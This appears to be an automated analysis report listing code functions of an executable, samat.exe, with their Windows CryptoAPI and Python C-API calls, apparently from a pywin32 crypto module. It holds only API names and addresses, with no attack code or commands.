                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EB5CD0 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,PyExc_TypeError,PyErr_SetString,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,CryptImportKey,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,??1PyWinBufferView@@QEAA@XZ,8_2_00007FF8B7EB5CD0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EB50D0 CryptReleaseContext,8_2_00007FF8B7EB50D0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EBA0D0 PyArg_ParseTupleAndKeywords,PyEval_SaveThread,CryptGetDefaultProviderW,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,malloc,PyExc_MemoryError,PyErr_Format,PyEval_SaveThread,CryptGetDefaultProviderW,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,?PyWinObject_FromOLECHAR@@YAPEAU_object@@PEB_W@Z,free,8_2_00007FF8B7EBA0D0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EB94B0 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,_Py_NoneStruct,PyExc_TypeError,PyErr_SetString,?PyWinObject_AsWCHAR@@YAHPEAU_object@@PEAPEA_WHPEAK@Z,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,??1PyWinBufferView@@QEAA@XZ,??1PyWinBufferView@@QEAA@XZ,_Py_NoneStruct,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,??1PyWinBufferView@@QEAA@XZ,??1PyWinBufferView@@QEAA@XZ,_Py_NoneStruct,PyEval_SaveThread,CryptProtectData,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,PyBytes_FromStringAndSize,LocalFree,?PyWinObject_FreeWCHAR@@YAXPEA_W@Z,PyMem_Free,8_2_00007FF8B7EB94B0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EB4490 _Py_Dealloc,_Py_Dealloc,CryptDestroyKey,8_2_00007FF8B7EB4490
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EBE870 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,PyLong_AsVoidPtr,PyErr_Occurred,PyErr_Clear,PyBytes_AsString,PyExc_ValueError,PyErr_Format,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,_Py_NoneStruct,PyExc_ValueError,PyErr_SetString,PyEval_SaveThread,CryptFormatObject,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,malloc,PyExc_MemoryError,PyErr_Format,PyEval_SaveThread,CryptFormatObject,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,?PyWinObject_FromOLECHAR@@YAPEAU_object@@PEB_W@Z,free,??1PyWinBufferView@@QEAA@XZ,8_2_00007FF8B7EBE870
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EB3C60 PyArg_ParseTupleAndKeywords,CryptDuplicateHash,_Py_NewReference,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,8_2_00007FF8B7EB3C60
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EBC860 PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,PyEval_SaveThread,CryptSignAndEncryptMessage,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,malloc,PyExc_MemoryError,PyErr_Format,PyEval_SaveThread,CryptSignAndEncryptMessage,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,PyBytes_FromStringAndSize,CertFreeCertificateContext,free,CertFreeCertificateContext,free,free,??1PyWinBufferView@@QEAA@XZ,8_2_00007FF8B7EBC860
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EB4050 PyArg_ParseTupleAndKeywords,PyExc_TypeError,PyErr_SetString,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,CryptVerifySignatureW,_Py_NoneStruct,_Py_NoneStruct,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,??1PyWinBufferView@@QEAA@XZ,8_2_00007FF8B7EB4050
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EB4430 _Py_Dealloc,_Py_Dealloc,CryptDestroyKey,8_2_00007FF8B7EB4430
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EB9C30 PyList_New,PyEval_SaveThread,CryptEnumProvidersW,PyEval_RestoreThread,malloc,PyEval_SaveThread,CryptEnumProvidersW,PyEval_RestoreThread,Py_BuildValue,PyList_Append,_Py_Dealloc,free,PyEval_SaveThread,CryptEnumProvidersW,PyEval_RestoreThread,GetLastError,_Py_Dealloc,PyErr_Occurred,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,_Py_Dealloc,free,GetLastError,free,PyExc_MemoryError,PyErr_Format,8_2_00007FF8B7EB9C30
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EB3C10 CryptDestroyHash,_Py_NoneStruct,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,8_2_00007FF8B7EB3C10
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EBD010 PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,PyEval_SaveThread,CryptGetMessageSignerCount,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,PyLong_FromLong,??1PyWinBufferView@@QEAA@XZ,8_2_00007FF8B7EBD010
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EB5000 CryptMsgClose,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,_Py_NoneStruct,_Py_NoneStruct,8_2_00007FF8B7EB5000
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EBF000 PyArg_ParseTupleAndKeywords,?PyWinObject_AsWCHAR@@YAHPEAU_object@@PEAPEA_WHPEAK@Z,PyEval_SaveThread,CryptStringToBinaryW,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,PyBytes_FromStringAndSize,PyEval_SaveThread,CryptStringToBinaryW,PyEval_RestoreThread,_Py_Dealloc,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,Py_BuildValue,PyMem_Free,8_2_00007FF8B7EBF000
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EB43E0 _Py_Dealloc,_Py_Dealloc,CryptDestroyKey,8_2_00007FF8B7EB43E0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EBAFD0 PyArg_ParseTupleAndKeywords,PyExc_ValueError,PyErr_SetString,PyExc_TypeError,PyErr_SetString,PyArg_ParseTuple,PyLong_AsLong,PyErr_Occurred,?PyWinObject_AsWCHAR@@YAHPEAU_object@@PEAPEA_WHPEAK@Z,PyBytes_AsString,PyEval_SaveThread,CryptFindOIDInfo,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,8_2_00007FF8B7EBAFD0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EB4BC0 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,PyExc_TypeError,PyErr_SetString,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,malloc,PyErr_NoMemory,memcpy,CryptDecrypt,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,PyBytes_FromStringAndSize,free,??1PyWinBufferView@@QEAA@XZ,8_2_00007FF8B7EB4BC0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EBC3B0 PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,PyEval_SaveThread,CryptEncryptMessage,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,malloc,PyExc_MemoryError,PyErr_Format,PyEval_SaveThread,CryptEncryptMessage,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,PyBytes_FromStringAndSize,CertFreeCertificateContext,free,free,??1PyWinBufferView@@QEAA@XZ,8_2_00007FF8B7EBC3B0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EBD3B0 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,PyEval_SaveThread,CryptVerifyDetachedMessageSignature,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,free,free,??1PyWinBufferView@@QEAA@XZ,free,8_2_00007FF8B7EBD3B0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EB3BA0 CryptDestroyHash,8_2_00007FF8B7EB3BA0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EB5B90 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,PyExc_TypeError,PyErr_SetString,CryptCreateHash,_Py_NewReference,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,8_2_00007FF8B7EB5B90
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EB5F80 PyArg_ParseTupleAndKeywords,PyExc_TypeError,PyErr_SetString,PyArg_ParseTupleAndKeywords,CryptImportPublicKeyInfo,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,8_2_00007FF8B7EB5F80
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EBCB80 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,PyEval_SaveThread,CryptVerifyMessageSignature,PyEval_RestoreThread,PyErr_Occurred,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,_Py_NoneStruct,Py_BuildValue,malloc,PyErr_NoMemory,PyEval_SaveThread,CryptVerifyMessageSignature,PyEval_RestoreThread,PyErr_Occurred,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,PyBytes_FromStringAndSize,Py_BuildValue,free,CertFreeCertificateContext,??1PyWinBufferView@@QEAA@XZ,free,8_2_00007FF8B7EBCB80
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EB3B70 CryptDestroyHash,8_2_00007FF8B7EB3B70
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EB3B60 CryptDestroyHash,8_2_00007FF8B7EB3B60
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EB4F60 CryptMsgClose,_Py_Dealloc,8_2_00007FF8B7EB4F60
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EB5350 PyArg_ParseTupleAndKeywords,CryptGetProvParam,malloc,PyExc_MemoryError,PyErr_Format,CryptGetProvParam,PyExc_NotImplementedError,PyErr_SetString,free,CryptGetProvParam,PyBool_FromLong,PyList_New,CryptGetProvParam,?PyWinCoreString_FromString@@YAPEAU_object@@PEBD_J@Z,?PyWinCoreString_FromString@@YAPEAU_object@@PEBD_J@Z,Py_BuildValue,PyList_Append,_Py_Dealloc,CryptGetProvParam,_Py_Dealloc,CryptGetProvParam,GetLastError,malloc,PyList_New,CryptGetProvParam,?PyWinCoreString_FromString@@YAPEAU_object@@PEBD_J@Z,PyList_Append,_Py_Dealloc,CryptGetProvParam,_Py_Dealloc,GetLastError,_Py_Dealloc,PyErr_Occurred,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,free,PyList_New,CryptGetProvParam,?PyWinCoreString_FromString@@YAPEAU_object@@PEBD_J@Z,Py_BuildValue,PyList_Append,_Py_Dealloc,CryptGetProvParam,_Py_Dealloc,GetLastError,_Py_Dealloc,PyErr_Occurred,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,8_2_00007FF8B7EB5350
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EBA350 PyArg_ParseTupleAndKeywords,?PyWinObject_AsWCHAR@@YAHPEAU_object@@PEAPEA_WHPEAK@Z,PyEval_SaveThread,CryptFindLocalizedName,PyEval_RestoreThread,_Py_NoneStruct,_Py_NoneStruct,?PyWinObject_FromOLECHAR@@YAPEAU_object@@PEB_W@Z,?PyWinObject_FreeWCHAR@@YAXPEA_W@Z,8_2_00007FF8B7EBA350
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EB4740 PyArg_ParseTupleAndKeywords,CryptGetKeyParam,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,malloc,PyExc_MemoryError,PyErr_Format,CryptGetKeyParam,GetLastError,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,PyExc_NotImplementedError,PyErr_SetString,free,8_2_00007FF8B7EB4740
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EBB740 PyArg_ParseTupleAndKeywords,PyList_New,PyEval_SaveThread,CryptEnumOIDInfo,PyEval_RestoreThread,_Py_Dealloc,PyErr_Occurred,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,8_2_00007FF8B7EBB740
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EB4F10 CryptMsgClose,_Py_Dealloc,8_2_00007FF8B7EB4F10
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EB3F00 PyArg_ParseTupleAndKeywords,CryptSignHashW,GetLastError,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,malloc,PyExc_MemoryError,PyErr_Format,CryptSignHashW,GetLastError,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,PyBytes_FromStringAndSize,free,8_2_00007FF8B7EB3F00
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EB4ED0 CryptMsgClose,_Py_Dealloc,8_2_00007FF8B7EB4ED0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EB9A90 PyArg_ParseTupleAndKeywords,?PyWinObject_AsWCHAR@@YAHPEAU_object@@PEAPEA_WHPEAK@Z,?PyWinObject_AsWCHAR@@YAHPEAU_object@@PEAPEA_WHPEAK@Z,PyEval_SaveThread,CryptAcquireContextW,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,?PyWinObject_FreeWCHAR@@YAXPEA_W@Z,?PyWinObject_FreeWCHAR@@YAXPEA_W@Z,8_2_00007FF8B7EB9A90
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EBCE90 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,PyExc_TypeError,PyErr_SetString,PyEval_SaveThread,CryptGetMessageCertificates,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,_Py_NewReference,PyLong_FromVoidPtr,??1PyWinBufferView@@QEAA@XZ,8_2_00007FF8B7EBCE90
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EB5270 PyArg_ParseTupleAndKeywords,CryptGenKey,GetLastError,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,8_2_00007FF8B7EB5270
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EBBA70 PyArg_ParseTupleAndKeywords,PyExc_ValueError,PyErr_Format,?init@PyWinBufferView@@QEAA_NPEAU_object@@_N1@Z,?PyWinObject_AsWCHAR@@YAHPEAU_object@@PEAPEA_WHPEAK@Z,PyEval_SaveThread,CryptQueryObject,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,_Py_NoneStruct,_Py_NoneStruct,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,PyLong_FromVoidPtr,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,PyLong_FromVoidPtr,Py_BuildValue,??1PyWinBufferView@@QEAA@XZ,PyMem_Free,8_2_00007FF8B7EBBA70
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EB9E70 PyList_New,PyEval_SaveThread,CryptEnumProviderTypesW,PyEval_RestoreThread,malloc,PyEval_SaveThread,CryptEnumProviderTypesW,PyEval_RestoreThread,_Py_NoneStruct,Py_BuildValue,PyList_Append,_Py_Dealloc,free,PyEval_SaveThread,CryptEnumProviderTypesW,PyEval_RestoreThread,GetLastError,_Py_Dealloc,PyErr_Occurred,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,_Py_Dealloc,free,GetLastError,free,PyExc_MemoryError,PyErr_Format,8_2_00007FF8B7EB9E70
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EBEE70 PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,PyEval_SaveThread,CryptBinaryToStringW,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,malloc,PyErr_NoMemory,PyEval_SaveThread,CryptBinaryToStringW,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,?PyWinObject_FromOLECHAR@@YAPEAU_object@@PEB_W_J@Z,free,??1PyWinBufferView@@QEAA@XZ,8_2_00007FF8B7EBEE70
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EB5A60 PyArg_ParseTupleAndKeywords,malloc,PyExc_MemoryError,PyErr_Format,memset,memcpy,CryptGenRandom,PyBytes_FromStringAndSize,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,free,8_2_00007FF8B7EB5A60
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EB5E40 PyArg_ParseTupleAndKeywords,CryptExportPublicKeyInfo,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,malloc,PyExc_MemoryError,PyErr_Format,CryptExportPublicKeyInfo,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,free,8_2_00007FF8B7EB5E40
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EB3E30 PyArg_ParseTupleAndKeywords,PyExc_TypeError,PyErr_SetString,CryptHashSessionKey,_Py_NoneStruct,_Py_NoneStruct,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,8_2_00007FF8B7EB3E30
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EB2E30 PyExc_ValueError,PyErr_SetString,PyArg_ParseTupleAndKeywords,PyEval_SaveThread,CryptAcquireCertificatePrivateKey,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,CryptContextAddRef,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,_Py_NewReference,Py_BuildValue,8_2_00007FF8B7EB2E30
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EBA230 PyArg_ParseTupleAndKeywords,?PyWinObject_AsWCHAR@@YAHPEAU_object@@PEAPEA_WHPEAK@Z,PyEval_SaveThread,CryptSetProviderExW,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,?PyWinObject_FreeWCHAR@@YAXPEA_W@Z,_Py_NoneStruct,_Py_NoneStruct,?PyWinObject_FreeWCHAR@@YAXPEA_W@Z,8_2_00007FF8B7EBA230
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EBBE2C _Py_NoneStruct,PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,PyEval_SaveThread,CryptDecodeMessage,PyEval_RestoreThread,PyErr_Occurred,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,??1PyWinBufferView@@QEAA@XZ,free,CertCloseStore,free,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,_Py_NoneStruct,Py_BuildValue,malloc,PyErr_NoMemory,PyEval_SaveThread,CryptDecodeMessage,PyEval_RestoreThread,PyErr_Occurred,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,free,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,PyBytes_FromStringAndSize,Py_BuildValue,free,CertFreeCertificateContext,CertFreeCertificateContext,8_2_00007FF8B7EBBE2C
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EB49F0 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,PyExc_TypeError,PyErr_SetString,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,CryptEncrypt,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,malloc,PyErr_NoMemory,CryptEncrypt,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,PyBytes_FromStringAndSize,free,??1PyWinBufferView@@QEAA@XZ,8_2_00007FF8B7EB49F0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EBC5F0 PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,PyEval_SaveThread,CryptDecryptMessage,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,malloc,PyErr_NoMemory,PyEval_SaveThread,CryptDecryptMessage,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,free,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,PyBytes_FromStringAndSize,Py_BuildValue,free,??1PyWinBufferView@@QEAA@XZ,CertCloseStore,free,8_2_00007FF8B7EBC5F0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EB51E0 PyArg_ParseTupleAndKeywords,CryptReleaseContext,_Py_NoneStruct,_Py_NoneStruct,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,8_2_00007FF8B7EB51E0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EBD9C0 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,PyLong_AsVoidPtr,PyErr_Occurred,PyErr_Clear,PyBytes_AsString,PyExc_ValueError,PyErr_Format,_Py_NoneStruct,PyExc_NotImplementedError,PyErr_SetString,strcmp,malloc,PyExc_MemoryError,PyErr_Format,strcmp,PyExc_NotImplementedError,PyErr_Format,PyErr_Format,malloc,PyEval_SaveThread,CryptEncodeObjectEx,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,PyBytes_FromStringAndSize,strcmp,free,LocalFree,8_2_00007FF8B7EBD9C0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EBD5C0 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,PyEval_SaveThread,CryptDecryptAndVerifyMessageSignature,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,malloc,PyErr_NoMemory,PyEval_SaveThread,CryptDecryptAndVerifyMessageSignature,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,free,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,PyBytes_FromStringAndSize,Py_BuildValue,free,??1PyWinBufferView@@QEAA@XZ,free,CertCloseStore,free,8_2_00007FF8B7EBD5C0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EB45B0 PyArg_ParseTupleAndKeywords,PyExc_TypeError,PyErr_SetString,CryptExportKey,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,malloc,PyExc_MemoryError,PyErr_Format,CryptExportKey,PyBytes_FromStringAndSize,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,free,8_2_00007FF8B7EB45B0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EB4180 PyArg_ParseTupleAndKeywords,CryptGetHashParam,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,malloc,PyExc_MemoryError,PyErr_Format,CryptGetHashParam,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,PyExc_NotImplementedError,PyErr_Format,PyBytes_FromStringAndSize,PyLong_FromUnsignedLong,free,8_2_00007FF8B7EB4180
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EBB180 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,?PyWinObject_AsWCHAR@@YAHPEAU_object@@PEAPEA_WHPEAK@Z,PyEval_SaveThread,CryptGetKeyIdentifierProperty,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,PyExc_NotImplementedError,PyErr_SetString,LocalFree,??1PyWinBufferView@@QEAA@XZ,PyMem_Free,8_2_00007FF8B7EBB180
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EB596C PyArg_ParseTupleAndKeywords,CryptGetUserKey,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,8_2_00007FF8B7EB596C
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EB4560 CryptDestroyKey,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,_Py_NoneStruct,_Py_NoneStruct,8_2_00007FF8B7EB4560
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EB3D30 PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,CryptHashData,_Py_NoneStruct,_Py_NoneStruct,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,??1PyWinBufferView@@QEAA@XZ,8_2_00007FF8B7EB3D30
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EBB520 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,?init@PyWinBufferView@@QEAA_NPEAU_object@@_N1@Z,?PyWinObject_AsWCHAR@@YAHPEAU_object@@PEAPEA_WHPEAK@Z,PyList_New,PyEval_SaveThread,CryptEnumKeyIdentifierProperties,PyEval_RestoreThread,_Py_Dealloc,PyErr_Occurred,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,??1PyWinBufferView@@QEAA@XZ,PyMem_Free,8_2_00007FF8B7EBB520
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EB5110 CryptReleaseContext,8_2_00007FF8B7EB5110
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EBD100 PyArg_ParseTupleAndKeywords,PyEval_SaveThread,CryptSignMessage,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,malloc,PyExc_MemoryError,PyErr_Format,PyEval_SaveThread,CryptSignMessage,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,PyBytes_FromStringAndSize,CertFreeCertificateContext,free,free,free,free,8_2_00007FF8B7EBD100
